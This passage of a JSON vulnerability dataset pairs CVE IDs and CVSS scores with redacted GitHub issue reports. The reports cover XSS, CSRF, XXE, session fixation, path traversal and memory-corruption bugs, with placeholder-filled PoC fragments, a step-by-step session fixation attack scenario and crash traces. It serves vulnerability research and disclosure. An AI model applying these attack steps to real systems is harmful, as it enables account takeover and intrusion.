  88155. {
  88156. "CVE_ID": "CVE-2017-14040",
  88157. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/995",
  88158. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/995",
  88159. "Repo_new": "uclouvain/openjpeg",
  88160. "Issue_Created_At": "2017-08-17T08:59:55Z",
  88161. "description": "invalid memory write in tgatoimage (convert.c). On master: ERRORTAG Testcase: URLTAG",
  88162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88163. "severity": "HIGH",
  88164. "baseScore": 8.8,
  88165. "impactScore": 5.9,
  88166. "exploitabilityScore": 2.8
  88167. },
  88168. {
  88169. "CVE_ID": "CVE-2017-16956",
  88170. "Issue_Url_old": "https://github.com/b3log/symphony/issues/509",
  88171. "Issue_Url_new": "https://github.com/b3log/symphony/issues/509",
  88172. "Repo_new": "b3log/symphony",
  88173. "Issue_Created_At": "2017-11-23T16:12:02Z",
  88174. "description": "Article exists XSS vulnerability. Hi,man.We meet again. Get to the APITAG problem appears in the article. My test environment symphony version : latest OS : APITAG NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG PM Vulnerability details Location : /article/ send private letter to anyone : APITAG I changed the value of this letter's title to xss payload APITAG and then send it. You must send two private APITAG will trigger vulnerability. Open one of the letters APITAG : APITAG Attack When person open the link, I can get their cookies. HTML code : APITAG APITAG Vulnerability Reporter : vulkey(mstsec)",
  88175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88176. "severity": "MEDIUM",
  88177. "baseScore": 6.1,
  88178. "impactScore": 2.7,
  88179. "exploitabilityScore": 2.8
  88180. },
  88181. {
  88182. "CVE_ID": "CVE-2017-17514",
  88183. "Issue_Url_old": "https://github.com/jcupitt/nip2/issues/70",
  88184. "Issue_Url_new": "https://github.com/libvips/nip2/issues/70",
  88185. "Repo_new": "libvips/nip2",
  88186. "Issue_Created_At": "2017-12-15T08:48:31Z",
  88187. "description": "CVETAG : shell argument injection via crafted URL. Hi John, CVETAG CVETAG showed up today: > boxes.c in nip NUMBERTAG does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument injection attacks via a crafted URL. Except for the Debian security tracker page URLTAG , I can find no information about it, so I'm guessing you weren't informed either NUMBERTAG is apparently the last version packaged by Debian, but later nip2 releases also carry the same code. In case it's useful, there's a form for submitting FILETAG to CVE records.",
  88188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88189. "severity": "HIGH",
  88190. "baseScore": 8.8,
  88191. "impactScore": 5.9,
  88192. "exploitabilityScore": 2.8
  88193. },
  88194. {
  88195. "CVE_ID": "CVE-2017-2809",
  88196. "Issue_Url_old": "https://github.com/tomoh1r/ansible-vault/issues/4",
  88197. "Issue_Url_new": "https://github.com/tomoh1r/ansible-vault/issues/4",
  88198. "Repo_new": "tomoh1r/ansible-vault",
  88199. "Issue_Created_At": "2017-05-09T15:27:43Z",
  88200. "description": "Security issue. Please provide contact/information on reporting security issues for Ansible vault",
  88201. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88202. "severity": "HIGH",
  88203. "baseScore": 7.8,
  88204. "impactScore": 5.9,
  88205. "exploitabilityScore": 1.8
  88206. },
  88207. {
  88208. "CVE_ID": "CVE-2017-5835",
  88209. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/88",
  88210. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/88",
  88211. "Repo_new": "libimobiledevice/libplist",
  88212. "Issue_Created_At": "2017-01-18T02:08:26Z",
  88213. "description": "memory allocation error. there is a extra large memery allocation error which can be detected by addresssanitizer NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG b NUMBERTAG a NUMBERTAG b2 ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG dc ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d2ed ( PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a1c4 in main PATHTAG NUMBERTAG b5fe3a NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG ) the source code around here are: APITAG = (uint NUMBERTAG t )malloc(sizeof(uint NUMBERTAG t) num_objects); the num_objects equals to a very large number. FILETAG",
  88214. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88215. "severity": "HIGH",
  88216. "baseScore": 7.5,
  88217. "impactScore": 3.6,
  88218. "exploitabilityScore": 3.9
  88219. },
  88220. {
  88221. "CVE_ID": "CVE-2017-6490",
  88222. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/167",
  88223. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/167",
  88224. "Repo_new": "Telaxus/EPESI",
  88225. "Issue_Created_At": "2017-03-02T18:19:01Z",
  88226. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : cid, value, element, mode, tab, form_name, id Value : > APITAG alert NUMBERTAG APITAG APITAG Want to back this issue? Post a bounty on it! URLTAG We accept bounties via Bountysource URLTAG . APITAG",
  88227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88228. "severity": "MEDIUM",
  88229. "baseScore": 6.1,
  88230. "impactScore": 2.7,
  88231. "exploitabilityScore": 2.8
  88232. },
  88233. {
  88234. "CVE_ID": "CVE-2017-8288",
  88235. "Issue_Url_old": "https://github.com/EasyScreenCast/EasyScreenCast/issues/46",
  88236. "Issue_Url_new": "https://github.com/easyscreencast/easyscreencast/issues/46",
  88237. "Repo_new": "easyscreencast/easyscreencast",
  88238. "Issue_Created_At": "2015-10-12T12:03:44Z",
  88239. "description": "Locking Screen sometimes dock and window list will remain in view. Sometimes when I lock the screen, the dock and window list will be in view. I am running Gnome NUMBERTAG on EL NUMBERTAG Beta with APITAG NUMBERTAG gnome shell NUMBERTAG Gjs WARNING : JS ERROR: Exception in callback for signal: updated: Error: Type name APITAG is already registered PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG",
  88240. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88241. "severity": "HIGH",
  88242. "baseScore": 8.1,
  88243. "impactScore": 5.9,
  88244. "exploitabilityScore": 2.2
  88245. },
  88246. {
  88247. "CVE_ID": "CVE-2017-9614",
  88248. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/167",
  88249. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/167",
  88250. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  88251. "Issue_Created_At": "2017-08-12T15:53:56Z",
  88252. "description": "CVETAG . The follow was crash reported on the full disclosure mailing list (It also includes a APITAG and was assigned CVETAG URLTAG",
  88253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88254. "severity": "HIGH",
  88255. "baseScore": 8.8,
  88256. "impactScore": 5.9,
  88257. "exploitabilityScore": 2.8
  88258. },
  88259. {
  88260. "CVE_ID": "CVE-2018-1000215",
  88261. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/267",
  88262. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/267",
  88263. "Repo_new": "davegamble/cjson",
  88264. "Issue_Created_At": "2018-05-21T09:21:27Z",
  88265. "description": "Memory leak here I think. cJSON.C Line NUMBERTAG If hooks >reallocate failed and set 'buffer >buffer' to NULL without free.",
  88266. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88267. "severity": "HIGH",
  88268. "baseScore": 7.5,
  88269. "impactScore": 3.6,
  88270. "exploitabilityScore": 3.9
  88271. },
  88272. {
  88273. "CVE_ID": "CVE-2018-1000519",
  88274. "Issue_Url_old": "https://github.com/aio-libs/aiohttp-session/issues/272",
  88275. "Issue_Url_new": "https://github.com/aio-libs/aiohttp-session/issues/272",
  88276. "Repo_new": "aio-libs/aiohttp-session",
  88277. "Issue_Created_At": "2018-04-30T08:22:10Z",
  88278. "description": "Session Fixation vulnerability in APITAG There is a window of opportunity for Session Fixation URLTAG exploitation in the logic of APITAG As seen here: URLTAG Get session data returns an empty dictionary for an empty (this includes invalidated) session. Referring here: URLTAG save_session takes this data and saves it in Redis. As a result, an invalidated session will result to the session ID being present in Redis with an empty mapping as its value. Now looking over at: URLTAG APITAG load_session only looks at the case where data (returned by reading from Redis) is None. This will happen only if the key (session ID) is not present in Redis (has either expired or was never inserted) but as we established above the key is never actually removed, just the value mapping emptied. As a result the load_session function will return a session with the presented session ID and not a new one, although there was no valid session in storage for this ID. If this is not caught and mitigated by the web app the following scenario can unfold: Attacker acquires a valid cookie Invalidates it (logs out) Attacker injects said cookie in victim's browser (see OWASP's link above for examples on how) Victim visits web app presenting the cookie present in his browser Web app uses the get_session to get a session object for the user, expecting a 'clean' session get_session returns a session with the session ID that was present in the cookie presented by the user session is populated by the web app and subsequently stored by aiohttp session during the response User is now logged in with the session ID of the cookie that was injected by the attacker The attacker now controls (knows) a session cookie for a given user",
  88279. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  88280. "severity": "MEDIUM",
  88281. "baseScore": 6.5,
  88282. "impactScore": 3.6,
  88283. "exploitabilityScore": 2.8
  88284. },
  88285. {
  88286. "CVE_ID": "CVE-2018-1000521",
  88287. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/328",
  88288. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/328",
  88289. "Repo_new": "bigtreecms/bigtree-cms",
  88290. "Issue_Created_At": "2018-02-23T16:59:59Z",
  88291. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG The low privileged(administrator) users can use this vulnerability to attack high APITAG users. For example\uff0cthere are two users: ]( URLTAG The low privileged(administrator) users can add user and set the email value to \u201c APITAG \u201d ![ URLTAG CODETAG When the high APITAG user view users\uff0che will be xssed: ]( URLTAG ![ URLTAG Thank you! email: EMAILTAG",
  88292. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88293. "severity": "MEDIUM",
  88294. "baseScore": 6.1,
  88295. "impactScore": 2.7,
  88296. "exploitabilityScore": 2.8
  88297. },
  88298. {
  88299. "CVE_ID": "CVE-2018-1000548",
  88300. "Issue_Url_old": "https://github.com/umlet/umlet/issues/500",
  88301. "Issue_Url_new": "https://github.com/umlet/umlet/issues/500",
  88302. "Repo_new": "umlet/umlet",
  88303. "Issue_Created_At": "2018-04-04T11:17:05Z",
  88304. "description": "XXE Security Vulnerability within Umlet Open File Function. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The line of code given below create an XML parser for parsing an XML file (or a uxf file) opened and parses the data within: URLTAG This parsing is done in an insecure manner and does not prohibit the usage of XML external entities. This allows attackers to do the above mentioned attacks on a targeted user. Attack Scenario An attacker could be sharing a diagram made within the Umlet software and exported as a uxf file. An example could be sharing a class diagram with a peer and exploiting that trusted relationship to perform unauthorised actions within their system (or even just downloading a class diagram online). APITAG File File named test.uxf APITAG",
  88305. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88306. "severity": "HIGH",
  88307. "baseScore": 7.8,
  88308. "impactScore": 5.9,
  88309. "exploitabilityScore": 1.8
  88310. },
  88311. {
  88312. "CVE_ID": "CVE-2018-1000632",
  88313. "Issue_Url_old": "https://github.com/dom4j/dom4j/issues/48",
  88314. "Issue_Url_new": "https://github.com/dom4j/dom4j/issues/48",
  88315. "Repo_new": "dom4j/dom4j",
  88316. "Issue_Created_At": "2018-07-01T09:25:35Z",
  88317. "description": "Validate APITAG inputs. APITAG doesn't validate inputs, so it is possible to create APITAG for example with '<' in the tag name. The bug was reported by MENTIONTAG thanks!",
  88318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  88319. "severity": "HIGH",
  88320. "baseScore": 7.5,
  88321. "impactScore": 3.6,
  88322. "exploitabilityScore": 3.9
  88323. },
  88324. {
  88325. "CVE_ID": "CVE-2018-1000651",
  88326. "Issue_Url_old": "https://github.com/gchq/stroom/issues/813",
  88327. "Issue_Url_new": "https://github.com/gchq/stroom/issues/813",
  88328. "Repo_new": "gchq/stroom",
  88329. "Issue_Created_At": "2018-07-23T12:28:20Z",
  88330. "description": "XXE in XML Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippet displays the usage of APITAG without disabling entities: URLTAG",
  88331. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  88332. "severity": "CRITICAL",
  88333. "baseScore": 10.0,
  88334. "impactScore": 6.0,
  88335. "exploitabilityScore": 3.9
  88336. },
  88337. {
  88338. "CVE_ID": "CVE-2018-1000820",
  88339. "Issue_Url_old": "https://github.com/neo4j-contrib/neo4j-apoc-procedures/issues/931",
  88340. "Issue_Url_new": "https://github.com/neo4j-contrib/neo4j-apoc-procedures/issues/931",
  88341. "Repo_new": "neo4j-contrib/neo4j-apoc-procedures",
  88342. "Issue_Created_At": "2018-09-29T09:24:23Z",
  88343. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
  88344. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  88345. "severity": "CRITICAL",
  88346. "baseScore": 10.0,
  88347. "impactScore": 6.0,
  88348. "exploitabilityScore": 3.9
  88349. },
  88350. {
  88351. "CVE_ID": "CVE-2018-1000872",
  88352. "Issue_Url_old": "https://github.com/OpenKMIP/PyKMIP/issues/430",
  88353. "Issue_Url_new": "https://github.com/openkmip/pykmip/issues/430",
  88354. "Repo_new": "openkmip/pykmip",
  88355. "Issue_Created_At": "2018-04-24T13:22:29Z",
  88356. "description": "No socket timeout may lead to denial of service. The server socket does not have a socket timeout defined. It is possible for a rogue connection to cause the server to be permanently stuck in the SSL handshake. To repro: Start server APITAG to establish a connection without completing the SSL handshake All future connections will be blocked Adding a defaulttimeout seems to fix this. CODETAG Log: ERRORTAG",
  88357. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88358. "severity": "MEDIUM",
  88359. "baseScore": 6.5,
  88360. "impactScore": 3.6,
  88361. "exploitabilityScore": 2.8
  88362. },
  88363. {
  88364. "CVE_ID": "CVE-2018-1002100",
  88365. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/61297",
  88366. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/61297",
  88367. "Repo_new": "kubernetes/kubernetes",
  88368. "Issue_Created_At": "2018-03-16T19:24:46Z",
  88369. "description": "Kubectl copy doesn't check for paths outside of its destination directory. Is this a BUG REPORT or FEATURE REQUEST? : Bug /kind bug What happened : kubectl cp PATHTAG PATHTAG If the container returns a malformed tarfile with paths like: PATHTAG kubectl writes this to APITAG instead of APITAG What you expected to happen : I expect kubectl to clean up the path and write to APITAG Notes Original credit to MENTIONTAG APITAG Hanselmann) for originally reporting the bug.",
  88370. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  88371. "severity": "MEDIUM",
  88372. "baseScore": 5.5,
  88373. "impactScore": 3.6,
  88374. "exploitabilityScore": 1.8
  88375. },
  88376. {
  88377. "CVE_ID": "CVE-2018-10186",
  88378. "Issue_Url_old": "https://github.com/radare/radare2/issues/9915",
  88379. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9915",
  88380. "Repo_new": "radareorg/radare2",
  88381. "Issue_Created_At": "2018-04-17T15:20:06Z",
  88382. "description": "heap buffer overflow in r_hex_bin2str ( PATHTAG ). This issue looks different from issue NUMBERTAG which is a stack based overflow and has been patched. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | dex | Architecture/bits of the file (mandatory) | ARM, Dalvik dex file version NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Successful processing of dex format Actual behavior heap buffer overflow Steps to reproduce the behavior download the attached POC checkout commit APITAG build with ASAN: ASAN='address' FILETAG run: radare2 A $POC Vulnerable code // PATHTAG NUMBERTAG R_API int r_hex_bin2str(const ut8 in, int len, char out NUMBERTAG int i, id NUMBERTAG char tmp FILETAG",
  88383. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88384. "severity": "MEDIUM",
  88385. "baseScore": 5.5,
  88386. "impactScore": 3.6,
  88387. "exploitabilityScore": 1.8
  88388. },
  88389. {
  88390. "CVE_ID": "CVE-2018-10550",
  88391. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4454",
  88392. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4454",
  88393. "Repo_new": "octopusdeploy/issues",
  88394. "Issue_Created_At": "2018-04-06T03:18:59Z",
  88395. "description": "User from tenant scoped team can see machines that do not scope to the tenant. Ticket: URLTAG Why Currently there is no restriction on machines that based on the scoped tenants, the restriction only apply on scoped environments What can we do? Apply the restrictions to machines based on scoped tenant. Check the filter logic in this class APITAG The complication Deployment target tenant setting can be ERRORTAG , ERRORTAG and Tenanted Tenant scoped users should not be able to see untenanted machines Tenant scoped users should not be able to see machine that does not scoped to the tenant Untenanted users should not be able to see tenanted only machines Should be more to add, let's have this one to start with Maybe it is not that bad Did a test that user scoped to NUMBERTAG tenant APITAG Project connected to tenants APITAG , APITAG and APITAG Deployment can only be made to APITAG Thought that user can see all other machines that from other tenants, as the user can only deployed to the scoped tenant, it is not that bad, it is more like a UI bug",
  88396. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  88397. "severity": "HIGH",
  88398. "baseScore": 7.5,
  88399. "impactScore": 3.6,
  88400. "exploitabilityScore": 3.9
  88401. },
  88402. {
  88403. "CVE_ID": "CVE-2018-11226",
  88404. "Issue_Url_old": "https://github.com/libming/libming/issues/144",
  88405. "Issue_Url_new": "https://github.com/libming/libming/issues/144",
  88406. "Repo_new": "libming/libming",
  88407. "Issue_Created_At": "2018-05-16T21:22:41Z",
  88408. "description": "buffer overflow in APITAG in APITAG URLTAG URLTAG Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG ea in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"buffer overflow detected\") at APITAG NUMBERTAG ffff NUMBERTAG in __GI___chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG c9 in _IO_str_chk_overflow (fp=<optimized out>, c=<optimized out>) at APITAG NUMBERTAG ffff NUMBERTAG b0 in __GI__IO_default_xsputn (f NUMBERTAG fffffffddb0, data=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG \"%ld\", ap=ap APITAG at APITAG NUMBERTAG ffff NUMBERTAG in ___vsprintf_chk (s NUMBERTAG b NUMBERTAG flags NUMBERTAG slen NUMBERTAG format NUMBERTAG af \"%ld\", APITAG at APITAG NUMBERTAG ffff NUMBERTAG ad in ___sprintf_chk (s=s APITAG NUMBERTAG flags=flags APITAG slen=slen APITAG format=format APITAG \"%ld\") at APITAG NUMBERTAG e NUMBERTAG in sprintf (__fmt NUMBERTAG af \"%ld\", __s NUMBERTAG b NUMBERTAG at PATHTAG NUMBERTAG APITAG (act=act APITAG at APITAG NUMBERTAG bb in APITAG (act=act APITAG at APITAG NUMBERTAG e9e9 in APITAG APITAG maxn NUMBERTAG actions NUMBERTAG a6e NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG bc9b in APITAG (n NUMBERTAG actions NUMBERTAG a6e NUMBERTAG maxn NUMBERTAG at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG a6ce0) at APITAG NUMBERTAG APITAG (n=<optimized out>, 
actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG c NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG c5f0) at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG e0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Breakpoint NUMBERTAG APITAG (act=act APITAG at APITAG NUMBERTAG t=malloc NUMBERTAG bit decimal / (gdb) l NUMBERTAG t = malloc(needed_length NUMBERTAG sprintf(t, \"%g\", act APITAG NUMBERTAG return t NUMBERTAG case PUSH_INT: / INTEGER NUMBERTAG t=malloc NUMBERTAG bit decimal NUMBERTAG sprintf(t,\"%ld\", act APITAG NUMBERTAG return t NUMBERTAG case PUSH_CONSTANT: / CONSTANT NUMBERTAG if (act APITAG > poolcounter) (gdb) n NUMBERTAG sprintf(t,\"%ld\", act APITAG ); (gdb) n NUMBERTAG t=malloc NUMBERTAG bit decimal / (gdb) n NUMBERTAG sprintf(t,\"%ld\", act APITAG ); (gdb) n buffer overflow detected : PATHTAG terminated",
  88409. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88410. "severity": "HIGH",
  88411. "baseScore": 8.8,
  88412. "impactScore": 5.9,
  88413. "exploitabilityScore": 2.8
  88414. },
  88415. {
  88416. "CVE_ID": "CVE-2018-11227",
  88417. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/438",
  88418. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/438",
  88419. "Repo_new": "monstra-cms/monstra",
  88420. "Issue_Created_At": "2018-05-17T00:21:08Z",
  88421. "description": "Monstra XSS Vulnerability MENTIONTAG Hello team :) I found xss at index page I reported to the cve platform, they let me use CVETAG , you can contact them for details Request GET PATHTAG NUMBERTAG a NUMBERTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: tr TR,tr; APITAG US; APITAG Accept Encoding: gzip, deflate DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Response APITAG APITAG APITAG new APITAG APITAG })( PATHTAG ); _mga('create', '', 'auto'); _mga('send', 'pageview', { 'page': ' URLTAG 'title': '' }); APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG jiznp\" /> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG <img id='cryptogram'",
  88422. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88423. "severity": "MEDIUM",
  88424. "baseScore": 6.1,
  88425. "impactScore": 2.7,
  88426. "exploitabilityScore": 2.8
  88427. },
  88428. {
  88429. "CVE_ID": "CVE-2018-11307",
  88430. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2032",
  88431. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2032",
  88432. "Repo_new": "fasterxml/jackson-databind",
  88433. "Issue_Created_At": "2018-05-10T04:23:03Z",
  88434. "description": "Security issue with default typing, another reported potential gadget type. (note: this is a placeholder and more details will be added after fix added, and ideally CVE allocated) A new potential gadget type has been reported, possibly affecting databind up to and including APITAG , APITAG , APITAG (as well as earlier minor versions). Type is from APITAG library.",
  88435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88436. "severity": "CRITICAL",
  88437. "baseScore": 9.8,
  88438. "impactScore": 5.9,
  88439. "exploitabilityScore": 3.9
  88440. },
  88441. {
  88442. "CVE_ID": "CVE-2018-11405",
  88443. "Issue_Url_old": "https://github.com/Kliqqi-CMS/Kliqqi-CMS/issues/256",
  88444. "Issue_Url_new": "https://github.com/kliqqi-cms/kliqqi-cms/issues/256",
  88445. "Repo_new": "kliqqi-cms/kliqqi-cms",
  88446. "Issue_Created_At": "2018-05-23T14:59:19Z",
  88447. "description": "There is a CSRF which can create an account with admin's privileges. After the admin logs in, clicking the following link creates eviladmin with admin's privileges. APITAG CODETAG",
  88448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88449. "severity": "HIGH",
  88450. "baseScore": 8.8,
  88451. "impactScore": 5.9,
  88452. "exploitabilityScore": 2.8
  88453. },
  88454. {
  88455. "CVE_ID": "CVE-2018-11489",
  88456. "Issue_Url_old": "https://github.com/pts/sam2p/issues/37",
  88457. "Issue_Url_new": "https://github.com/pts/sam2p/issues/37",
  88458. "Repo_new": "pts/sam2p",
  88459. "Issue_Created_At": "2018-05-24T02:23:49Z",
  88460. "description": "Heap Buffer Overflow NUMBERTAG in function APITAG in cgif.c. Here is the bug NUMBERTAG else NUMBERTAG Its a code to needed to be traced: trace the linked list NUMBERTAG until the prefix is a pixel, while pushing the suffi NUMBERTAG pixels on our stack. If we done, pop the stack in reverse NUMBERTAG thats what stack is good for!) order to output NUMBERTAG if APITAG == NO_SUCH_CODE) { in line NUMBERTAG APITAG should be checked cause Prefix is a array which has LZ_MAX_CODE NUMBERTAG size: unsigned int Prefix[LZ_MAX_CODE NUMBERTAG The crash appears as follows: (gdb) run crash NUMBERTAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG if APITAG == NO_SUCH_CODE) { (gdb) bt NUMBERTAG in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG eb in APITAG APITAG Line=<optimized out>, APITAG out>) at APITAG NUMBERTAG ba in APITAG APITAG at APITAG NUMBERTAG d in in_gif_reader (ufd=<optimized out>) at APITAG NUMBERTAG fca8 in Image::load (ufd NUMBERTAG a NUMBERTAG APITAG format=format APITAG at APITAG NUMBERTAG eb0 in run_sam2p_engine (sout=..., serr=..., arg NUMBERTAG optimized out>, helpp=helpp APITAG at APITAG NUMBERTAG d0 in main (arg NUMBERTAG fffffffe5c8) at APITAG (gdb) p APITAG NUMBERTAG gdb)",
